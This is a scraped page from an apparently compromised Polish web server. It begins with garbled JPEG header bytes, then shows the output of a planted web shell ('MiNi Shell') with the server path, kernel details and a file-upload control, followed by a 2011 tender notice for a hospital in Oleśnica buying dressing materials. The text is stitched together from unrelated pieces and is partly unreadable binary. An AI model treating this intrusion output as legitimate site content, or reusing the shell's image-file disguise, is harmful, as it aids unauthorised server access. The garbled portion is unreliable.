JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110401/62434-N-2011.html

<p class="kh_header"><b>Oleśnica: Dostawa materiałów opatrunkowych dla Powiatowego Zespołu Szpitali w Oleśnicy</b><br>
<b>Numer ogłoszenia: 62434 - 2011; data zamieszczenia: 01.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych dla Powiatowego Zespołu Szpitali w Oleśnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów opatrunkowych dla Powiatowego Zespołu Szpitali w Oleśnicy.
Zamawiający wymaga, aby opatrunki jałowe były sterylizowane parą wodną i były zgodne z kl. II reguła 7 Rozporządzenia Ministra Zdrowia z dnia 2 grudnia 2002 r. w sprawie klasyfikacji wyrobów medycznych (Dz. U. z dnia 18 grudnia 2002 r.)
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety:
Pakiet nr 1 - Opatrunki z gazy
Pakiet nr 2 - Plastry i przylepce
Pakiet nr 3 - Opatrunki specjalistyczne
Pakiet nr 4 - Materiały hemostatyczne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.18-0, 33.14.11.19-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o przedmiotowe zamówienie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz musi spełniać wszystkie warunki określone a art. 22 ust. 1 ustawy Prawo zamówień publicznych. Na potwierdzenie spełniania tego warunku Wykonawca musi złożyć oświadczenie według wzoru stanowiącego załącznik nr 4 do SIWZ oraz dokumenty wymienione w punkcie 10 a), b).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach warunku dotyczącego posiadania wiedzy i doświadczenia, Wykonawca ubiegający się o przedmiotowe zamówienie musi posiadać min. 2 należycie wykonane dostawy materiałów opatrunkowych każda o wartości brutto:
- min. 97 tys. zł. w przypadku złożenia oferty na asortyment określony w Pakiecie nr 1
- min. 7 tys. zł. w przypadku złożenia oferty na asortyment określony w Pakiecie nr 2
- min. 12 tys. zł. w przypadku złożenia oferty na asortyment określony w Pakiecie nr 3
- min. 5 tys. zł. w przypadku złożenia oferty na asortyment określony w Pakiecie nr 4

W przypadku złożenia oferty na więcej niż jeden pakiet, Wykonawca musi posiadać min. 2
dostawy (rozpoczęte i zakończone) materiałów opatrunkowych, zrealizowane w
ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli
okres prowadzenia działalności jest krótszy - w tym okresie, o wartości brutto, która stanowi
sumę podanych wyżej wartości dla pakietów, które dotyczą składanej oferty, np.
Wykonawca, który składa ofertę na asortyment zawarty w Pakiecie 1 oraz w Pakiecie 2, musi
posiadać min. 2 dostawy (rozpoczęte i zakończone) materiałów opatrunkowych,
zrealizowane w ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie
zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości brutto min. 104 tys. zł.
Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca w/w warunki spełnił. Niespełnienie któregoś z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)  Deklaracje zgodności CE producenta (dotyczy wszystkich klas wyrobu medycznego)
b) zgłoszenia lub wpisy do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania. Jeżeli oferowany przedmiot zamówienia nie wymaga zgłoszenia lub wpisu do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, Wykonawca składa stosowne wyjaśnienie.
c) karty danych technicznych producentów włóknin i innych surowców użytych do produkcji wyrobu gotowego potwierdzające parametry oferowanych wyrobów
d) karty badań potwierdzające spełnianie wymogów normy odpowiednio: PN-EN 13795 1-3, PN-EN 13795 1-2, 868-5
Na wezwanie Zamawiającego, Wykonawca jest zobowiązany dostarczyć próbki oferowanego asortymentu, w celu weryfikacji spełnienia warunków określonych w SIWZ. Zamawiający nie dokona zwrotu próbek wyrobów jednorazowego użytku.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi również zawierać następujące dokumenty i oświadczenia:
a)  wypełniony formularz asortymentowo-cenowy (załącznik nr 2 do SIWZ)
b) w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2011 godzina 09:00, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Opatrunki z gazy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Opaska wiskozowa dziana
rozmiar: 4mx15cm x1
ilość: 6000 szt.
rozmiar: 4mx10cm x 1
ilość: 10000 szt.
rozmiar: 4mx5cm x 1
ilość: 500 szt.
2. Opaska elastyczna tkana z zapinką typu Matopat Universal lub równoważna
rozmiar: 4m do 5m x 10cm x1
ilość: 400 szt.
rozmiar: 4m do 5m x 12cm x1
ilość: 250 szt.
rozmiar: 4m do 5m x 15cm x1
ilość: 2000 szt.
3. Opaska gipsowa szybkowiążąca (czas wiązania 6-5 minut)
rozmiar: 10cm x 3m x 1
ilość: 450 szt.
rozmiar: 12cm x 3m x 1
ilość: 2500 szt.
rozmiar: 15cm x 3m x 1
ilość: 4200 szt.
rozmiar: 20cm x 3m x 1
ilość: 100 szt.
4. Podkład podgipsowy naturalny
rozmiar: 10cm x 3m x1
ilość: 100 szt.
rozmiar: 12cm x 3m x 1
ilość: 900 szt.
rozmiar: 15cm x 3m x 1
ilość: 2000 szt.
rozmiar: 20cm x 3m x 1
ilość: 100 szt.
5. Kompresy gazowe niejałowe z gazy 17-nitkowej
rozmiar: 8 W 7,5cm x 7,5cm x 100szt
ilość: 5000 op.
rozmiar: 12 W 7,5cm x 7,5cm x 100
ilość: 1100 op.
rozmiar: 12 W 5cm x 5cm x 500
ilość: 150 op.
rozmiar: 12 W 10cm x 10cm x100
ilość: 10 op.
6. Kompresy wysokochłonne niejałowe typu Absorba lub równoważne
rozmiar: 10cm x 15cm x 20 szt.
ilość: 20 op.
rozmiar: 10cm x 20cm x 20 szt.
ilość: 20 op.
7. Kompresy włókninowe niejałowe 30g/m2
rozmiar: 7, 5cm x 7,5 cm x 100
ilość: 400 op.
rozmiar: 10cm x 10cm x 100
ilość: 500 op.
8. kompresy gazowe jałowe z gazy 17-nitkowej  pakowane pojedynczo (chirurgiczny, inwazyjny wyrób medyczny)
rozmiar: 12W 7,5cm x7,5cm x3 szt.
ilość: 5000 op.
rozmiar: 12w 9cm x 9cm x 3szt
ilość: 500 op.
9. serweta operacyjna bawełniana niejałowa z gazy 17-nitkowej z nitką radiacyjną i z tasiemką
rozmiar: 4 W 45cm x 45cm x 1 szt.
ilość: 6200 szt.
10. serweta operacyjna bawełniana z gazy 17- nitkowej niejałowa bez nitki i bez tasiemki
rozmiar: 4W  45cm x 45cm x 1 szt.
ilość: 15000 szt.
11. gaza opatrunkowa kopertowana z gazy 17-nitkowej jałowa (chirurgiczny, inwazyjny wyrób medyczny) pow. 1m2 x 1szt
ilość: 4000 szt.
12. gaza opatrunkowa kopertowana z gazy 17-nitkowej niejałowa	pow. 1m2 x 1szt
ilość: 550 szt.
13. gaza bawełniana  niejałowa w metrach bieżących 17-nitkowa	szerokość 90cm
ilość: 11000 mb
14. wata celulozowa higieniczna bielona w arkuszach 40cm x 60cm, 1kg
ilość: 2200 kg
15. wata opatrunkowa bawełniano-wiskozowa, po 500g
ilość: 120 szt.
16. chustka trójkątna bawełniana
ilość: 120 szt.
17. setony z gazy 17-nitkowej niejałowe
rozmiar: 4W 2m x 5cm x 1 szt.
ilość:	136 szt.
18. Elastyczna siatka opatrunkowa typu Codofix lub równoważna (metry luźne)
rozmiar: Nr 1 dł. 100cm szer. 1,5cm (palec)
ilość: metr	10
rozmiar: Nr 2 dł. 100cm szer. 1,5-2,5cm (dłoń, stopa)	metr	5
rozmiar: Nr 3 dł. 100cm szer. 2,5-3,5cm (ramię, łokieć)	metr	10
rozmiar: Nr 4 dł. 100cm szer. 3,5-4,5cm (podudzie, kolano)
ilość: 15 m
rozmiar: Nr 6 dł. 100cm szer. 5-6,5cm (głowa, ramię, podudzie, kolano)
ilość: 50 m
rozmiar: Nr 8 dł. 100cm szer. 7-9,5cm (udo, głowa, biodra)
ilość: 60 m
rozmiar: Nr 10 dł. 100cm szer. 10-13,5 cm (biodra)
ilość: 25 m
rozmiar: Nr 14 dł. 100cm szer. 13,5-16cm (klatka piersiowa, brzuch)
ilość: 10 m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.13-4, 33.14.11.15-9, 33.14.11.18-0, 33.14.11.19-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Plastry i przylepce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przylepiec na tkaninie typu Polovis lub równoważny
rozmiar: 5m x 25mm x1
ilość: 1600 szt.
2. Przylepiec hipoalergiczny włókninowy typu Polopor lub równoważny
rozmiar: 9,2m do 9,14m x 2,5cm x 1
ilość: 1000
3. Plaster tkaninowy z opatrunkiem typu Fixovis lub równoważny
rozmiar: 6cm x 1m x 1
ilość: 50 szt.
rozmiar: 6cm x 10cm x1
ilość: 600 szt.
4. Półelastyczny włókninowy przylepiec chirurgiczny typu Omnifix lub równoważny
rozmiar: 15cm x10m x 1
ilość: 55 szt.
rozmiar: 20cm x10m x 1
ilość: 45 szt.
rozmiar: 10cm x10m x 1
ilość: 65 szt.
rozmiar: 5cm x 10m x 1
ilość: 10 szt.
5. Przylepiec włókninowy z opatrunkiem chłonnym, jałowy typu Elastopor steril lub równoważny
rozmiar: 35cm do 30cm x 10cm x1
ilość: 800 szt.
rozmiar: 25cm x10 do 9cm x1
ilość: 2200 szt.
rozmiar: 20cm x 10 do 9cm x 1
ilość: 1500 szt.
rozmiar: 10cmx15cmx1
ilość: 60 szt.
rozmiar: 10cmx10cmx1
ilość: 180 szt.
rozmiar: 10cm x 8cm x1
ilość: 1200 szt.
rozmiar: 10cm x 6cm x1
ilość: 1800 szt.
rozmiar: 7,2cm x 5cm x1
ilość: 3600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.12-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Opatrunki specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Paski hypoalergiczne przylepne do zamykania ran, typu Steri strip lub równoważne, rozmiar: 3mm x 75mm do 76mm x 5 szt.
ilość: 150 op.
rozmiar: 6mm x 38 mm x 6 szt.
ilość: 50 op.
2. Transparentna folia samoprzylepna jałowa (powierzchnia łączna), pakowana pojedynczo,  typu Opsite lub równoważna
rozmiar: 45cm x 28cm do 27cm x 1 szt.
ilość: 200 szt.
rozmiar: 30cm x 28 cm do 27cm x 1 szt.
ilość: 100 szt.
rozmiar: 15cm x 28cm do 27cm x 1
ilość: 300 szt.
3. Opatrunek parafinowy jałowy typu Jelonet lub równoważny
rozmiar: 10cm x 10cm x 1
ilość: 580 szt.
4. Opatrunek hydrożelowy sterylny typu Aqua - Gel lub równoważny
rozmiar: 12 x 24cm x 1
ilość: 110 szt.
5. Opatrunek poliuretanowy  chłonny do ran głębokich typu Allevyn cavity lub równoważny
rozmiar: 12/4 x 1 szt.
ilość: 25 szt.
6. Opatrunek wyjałowiony oczyszczający żelowy, typu Intrasite gel lub równoważny
rozmiar: 25g  x 1szt (tylko ten rozmiar)
ilość: 5 szt.
7. Samoprzylepny opatrunek hydrokoloidowy (karboksymetyloceluloza sodowa, pektyna, żelatyna) wykonany w 45% z masy hydrokoloidowej. Zapewnia wilgotne środowisko leczenia ran, pochłania nadmiar wysięku, wodoodporny, nie przepuszcza bakterii i wirusów do ran. Do ran przewlekłych i ostrych, typu Granuflex lub równoważny. 
rozmiar: 15cmx20cmx1
ilość: 50 szt.
8.  Opatrunek hydrokoloidowy w formie pasty, składający się z 3 hydrokoloidów, karboksymetylocelulozy sodowej, pektyny, żelatyny do leczenia ran głębokich bez martwicy z małą lub umiarkowaną ilością wysięku typu Granuflex pasta lub równoważny.30g
ilość: 5 op.
9. Nietkany opatrunek hydrowłóknisty, zbudowany z włókien karboksymetylocelulozy sodowej, z dodatkiem 1,2% jonów srebra, typu Aquacel Ag lub równoważny.	
rozmiar: 10cmx10cm
ilość: 20 op.
rozmiar: 5cmx5cm
ilość: 15 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Materiały hemostatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Gąbka hemostatyczna z żelatyny, wchłaniana, typu Gelita Tampon, 8x5x1cm
ilość: 50 szt.
2. Gąbka hemostatyczna z żelatyny, wchłaniana, typu Gelita Tampon, 1x1x1cm
ilość: 50 szt.
3. Opatrunek hemostatyczny z kolagenu, wchłanialny, typu Lyostyp, 5x8cm
ilość: 12 szt.
4. Opatrunek hemostatyczny z kolagenu, wchłanialny, typu Lyostyp, 10x12cm
ilość: 8 szt.
5. Wosk kostny - mieszanina wosku pszczelego i wazeliny, typu Bone wax, 2,5 g listek
ilość: 24 szt.
6. Kompres hemostatyczny z aktywnego kolagenu + ryboflawina, typu Sangustop	5x8x0,5cm
ilość: 2 szt.
7. Kompres hemostatyczny z aktywnego kolagenu + ryboflawina, typu Sangustop	3x5x0,5cm
ilość: 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com